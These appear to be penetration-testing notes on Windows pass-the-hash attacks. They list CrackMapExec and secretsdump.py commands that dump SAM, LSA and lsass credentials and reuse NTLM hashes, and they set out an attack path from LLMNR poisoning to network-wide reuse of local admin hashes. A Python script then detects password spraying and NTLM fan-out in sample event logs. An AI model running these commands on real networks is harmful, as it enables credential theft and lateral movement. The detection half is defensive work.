Pass Attacks

CrackMapExec

Commands
# SMB
crackmapexec smb IP_ADDRESS or SUBNET -u USER -d DOMAIN -p PASSWORD

# SMB using Hash (only NTLMv1)
crackmapexec smb IP_ADDRESS or SUBNET -u USER -H HASH --local-auth 

# Dump SAM - add this at the end of the command
--sam

# List shares on machines
--shares

# Dump LSA
--lsa

# Use lsassy to dump and parse lsass
-M lsassy

# Access CrackMapExec DB
cmedb

# Dumps all hosts in DB
hosts

# Dumps all creds in DB
creds

Secretsdump.py

Commands
# Using a password
secretsdump.py DOMAIN/USER:'PASSWORD'@IP_ADDRESS

# Using hashes (impacket's -hashes takes LMHASH:NTHASH; the LM half can be left empty, e.g. :NTHASH)
secretsdump.py USER@IP_ADDRESS -hashes LMHASH:NTHASH

Attack path

LLMNR poisoning -> captured hash -> crack hashes -> spray password -> look for new logins -> secretsdump with new logins -> local admin hashes -> respray network with local accounts
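The defender-side counterpart to this path and to the CrackMapExec spray/pass-the-hash commands above, added here as an example (it is not part of the original notes and is not code from CrackMapExec or impacket): the spray phase leaves one source address trying many different accounts in a short window, and the pass-the-hash sweep leaves one account producing network (LogonType 3) NTLM logons on many hosts in a short window. The script correlates both patterns over constructed Windows Security events. The flattened key=value log format, the hostnames, user names and 10.0.0.x addresses, and the thresholds are all assumptions made for the sample.

```python
"""Spot a password spray followed by NTLM lateral-movement fan-out in
Windows Security events (4625 = failed logon, 4624 = successful logon).
Added example; constructed data, not a real log export format."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a spray from 10.0.0.50 that finds erin's password,
# then erin's hash is used against four hosts half an hour later.
# Hosts, users and addresses are placeholders.
SAMPLE_LOG = """\
2024-03-01T09:00:01 EventID=4625 Computer=WS01 TargetUser=alice IpAddress=10.0.0.50 LogonType=3 AuthPackage=NTLM
2024-03-01T09:00:02 EventID=4625 Computer=WS01 TargetUser=bob IpAddress=10.0.0.50 LogonType=3 AuthPackage=NTLM
2024-03-01T09:00:03 EventID=4625 Computer=WS01 TargetUser=carol IpAddress=10.0.0.50 LogonType=3 AuthPackage=NTLM
2024-03-01T09:00:04 EventID=4625 Computer=WS01 TargetUser=dave IpAddress=10.0.0.50 LogonType=3 AuthPackage=NTLM
2024-03-01T09:00:05 EventID=4624 Computer=WS01 TargetUser=erin IpAddress=10.0.0.50 LogonType=3 AuthPackage=NTLM
2024-03-01T09:05:00 EventID=4625 Computer=FS01 TargetUser=frank IpAddress=10.0.0.77 LogonType=3 AuthPackage=NTLM
2024-03-01T09:30:00 EventID=4624 Computer=WS01 TargetUser=erin IpAddress=10.0.0.50 LogonType=3 AuthPackage=NTLM
2024-03-01T09:30:10 EventID=4624 Computer=WS02 TargetUser=erin IpAddress=10.0.0.50 LogonType=3 AuthPackage=NTLM
2024-03-01T09:30:20 EventID=4624 Computer=WS03 TargetUser=erin IpAddress=10.0.0.50 LogonType=3 AuthPackage=NTLM
2024-03-01T09:30:30 EventID=4624 Computer=FS01 TargetUser=erin IpAddress=10.0.0.50 LogonType=3 AuthPackage=NTLM
2024-03-01T09:31:00 EventID=4624 Computer=DC01 TargetUser=grace IpAddress=10.0.0.12 LogonType=3 AuthPackage=Kerberos
"""


def parse_line(line):
    """Turn 'TIMESTAMP key=value ...' into a dict with a datetime under 'time'."""
    ts, *fields = line.split()
    event = dict(f.split("=", 1) for f in fields)
    event["time"] = datetime.fromisoformat(ts)
    return event


def parse_log(text):
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def find_password_spray(events, window=timedelta(minutes=5), min_accounts=4):
    """Sources that tried >= min_accounts distinct accounts inside `window`.
    Returns {source_ip: {"accounts": set, "succeeded": set}}; 'succeeded'
    lists the accounts the spray actually got into (4624 within the window)."""
    by_source = defaultdict(list)
    for ev in events:
        if ev["EventID"] in ("4624", "4625"):
            by_source[ev["IpAddress"]].append(ev)
    hits = {}
    for src, evs in by_source.items():
        evs.sort(key=lambda e: e["time"])
        for i, start in enumerate(evs):
            in_window = [e for e in evs[i:] if e["time"] - start["time"] <= window]
            accounts = {e["TargetUser"] for e in in_window}
            if len(accounts) >= min_accounts:
                succeeded = {e["TargetUser"] for e in in_window if e["EventID"] == "4624"}
                hits[src] = {"accounts": accounts, "succeeded": succeeded}
                break
    return hits


def find_ntlm_fanout(events, window=timedelta(minutes=10), min_hosts=3):
    """Accounts with successful network (LogonType 3) NTLM logons on
    >= min_hosts distinct hosts inside `window`: the footprint a hash-based
    sweep leaves on the targets. Returns {account: set_of_hosts}."""
    by_user = defaultdict(list)
    for ev in events:
        if ev["EventID"] == "4624" and ev["LogonType"] == "3" and ev["AuthPackage"] == "NTLM":
            by_user[ev["TargetUser"]].append(ev)
    hits = {}
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["time"])
        for i, start in enumerate(evs):
            hosts = {e["Computer"] for e in evs[i:] if e["time"] - start["time"] <= window}
            if len(hosts) >= min_hosts:
                hits[user] = hosts
                break
    return hits


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for src, info in find_password_spray(evs).items():
        print(f"spray from {src}: {len(info['accounts'])} accounts tried, "
              f"succeeded for {sorted(info['succeeded'])}")
    for user, hosts in find_ntlm_fanout(evs).items():
        print(f"NTLM fan-out by {user}: {sorted(hosts)}")
```

Both detections are rate-based, so the thresholds need a baseline per environment: vulnerability scanners, backup agents and an authorised CrackMapExec run all produce the same NTLM type-3 fan-out, and a service account with a stale password produces repeated 4625s from one host. The last step of the path (local admin hash reused across the network) is the one these alerts arrive too late for; unique local administrator passwords per host (LAPS) and restricting NTLM where it is not needed remove that step rather than detect it.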
